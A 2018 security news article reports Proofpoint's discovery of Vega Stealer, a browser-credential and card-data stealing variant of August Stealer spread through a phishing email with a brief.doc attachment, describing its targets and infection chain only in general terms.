Posted on May 14, 2018 at 2:08 PM
Proofpoint researchers have discovered a new variation of August Stealer malware. The new malware is called Vega Stealer, and its goal is infection and theft from Firefox and Chrome.
New malware is an improvement on the old one
Researchers from Proofpoint have uncovered a new form of an old malware called August Stealer. The new and improved version was named Vega Stealer, and its goal is to steal credit-card data and credentials saved in Firefox and Google Chrome browsers. However, the real concern is that this malware has a potential to outgrow its payload purpose and become much more of a problem.
The connection to August Stealer was made after the researchers uncovered that the new malware has August’s functionality, but with the addition of new features.
Not only does it steal data from the browsers, but Vega also has the potential to exfiltrate various types of files, including PDF, Excel, as well as Word. For now, these are the same possibilities that August could do, even though the parent version of the malware did not have this as part of its hard-code. The ability of Vega to steal from Chrome is also inherent, with the addition of August’s potential to impact other browsers, as well as apps like Skype.
When it comes to Vega’s new features, they include the ability to steal from Firefox, as well as the inclusion of a network communication protocol.
As for Vega’s method of spreading, researchers have so far been able to observe an attempt of infection through an email campaign. Emails with subjects lie “Online store developer required” were being sent to individuals, but also to larger distribution lists. Emails came with an attachment by the name of brief.doc, which has served as a housing malware.
So far, the campaign attempted to target rather specific sectors – retail, marketing, manufacturing, public relations, as well as advertising.
How does it work?
The process of retrieving the payload consists of two steps. First, the doc would execute a request that would retrieve PowerShell or Java Scripts, which would cause the second request. The second one downloads the malware payload to the music directory of the user’s device. A simple command line will then execute this malware automatically.
Not only does this approach remind of what August Stealer used to do, but it also looks very similar to Ursnif banking trojan. This discovery has caused researchers to consider it to be a commodity macro which can be sold. According to their report, the URL patterns that are used for getting the payload are identical to the ones found in the distribution of Ursnif banking Trojan. With that in mind, it is possible that both of these malware came from the same source.
Researchers say that Vega was written in .NET, and that it is possible that it was created for this very campaign alone, due to its lack of obfuscation methods or packing. However, that does not mean that it couldn’t be used in the future.
So far, it is neither particularly stealthy nor is it as complex as much other malware. However, this is a clear indication that malware might be even more flexible than previously believed, with the same going for their creators and users. It is possible that this malware could have a much bigger impact if it reaches its full potential.